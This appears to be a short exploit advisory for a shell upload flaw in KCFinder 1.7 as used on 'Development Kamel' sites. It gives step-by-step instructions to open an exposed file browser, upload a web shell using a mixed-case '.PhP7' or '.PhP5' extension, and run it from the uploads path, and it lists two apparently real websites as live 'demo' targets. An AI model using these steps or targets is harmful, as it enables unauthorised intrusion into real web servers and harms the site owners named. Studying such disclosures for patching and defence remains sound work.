Development Kamel KCFinder version 1.7 suffers from a remote shell upload vulnerability.
767d8feb55914271022aee9787fcc915fb010c7584b18d3e7fb163230628b601
#######################################################
#
# [+] Exploit Title : Development Kamel - KCFinder Shell Upload Vulnerability
# [+] Date : 25/03/2021
# [+] Exploit Author : RAYAN ALi
# [+] Home : https://kamel.tech/
# [+] Discovered By : RAYAN
# [+] Vendor Homepage : https://kamel.tech/
#
#######################################################
#
# [+] Exploit:
#
# [+] https://[localhost]/resources/admin/Editor/kcfinder/browse.php?type=files
#
#
#######################################################
#
# [+] Proof:
#
# [~] STEP 1 > Go to target link
# https://localhost/resources/admin/Editor/kcfinder/browse.php?type=files
#
#
# [~] STEP 2 > Upload your shell as [ shell.PhP7 & shell.PhP5 ]
#
# [~] STEP 3 > Shell execution path
# https://[localhost]/[path]/resources/uploads/files/shell.PhP7
# [~] The End
#
#######################################################
#
Demo Site:
https://waqftaiba.sa/resources/admin/Editor/kcfinder/browse.php?type=files
https://qepsco.com/resources/admin/Editor/kcfinder/browse.php?type=files
#######################################################
#
# [+] Discovered By : RAYAN ALI
# [+] https://twitter.com/i0i8x
# [+] https://www.instagram.com/vgz_/
# [+] Home : Null
#
#######################################################